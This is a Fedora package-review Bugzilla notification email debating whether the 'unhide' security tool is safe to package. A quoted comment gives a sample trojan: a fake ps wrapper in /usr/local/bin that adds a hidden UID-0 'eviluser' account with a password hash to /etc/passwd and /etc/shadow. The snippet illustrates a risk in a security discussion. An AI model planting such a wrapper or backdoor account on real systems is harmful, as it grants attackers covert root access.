Please do not reply directly to this email. All additional comments should be made in the comments box of this bug. https://bugzilla.redhat.com/show_bug.cgi?id=469843 --- Comment #6 from Till Maas <opensource@xxxxxxxxx> 2008-12-08 15:21:54 EDT --- (In reply to comment #5) > To be honest, I would not run this "security application" on my system. I am > afraid of something along > cat >> /usr/local/bin/ps << EOF > #! /bin/bash > echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd > echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >> > /etc/shadow > /bin/ps $* > EOF /usr/local/bin is only writable by root and how does not packaging unhide prevent you from this attack? Or do you never use ps without an absolute path as root? Nevertheless, the attacker could also do this for any binary on the system, not only ps. -- Configure bugmail: https://bugzilla.redhat.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug. _______________________________________________ Fedora-package-review mailing list Fedora-package-review@xxxxxxxxxx http://www.redhat.com/mailman/listinfo/fedora-package-review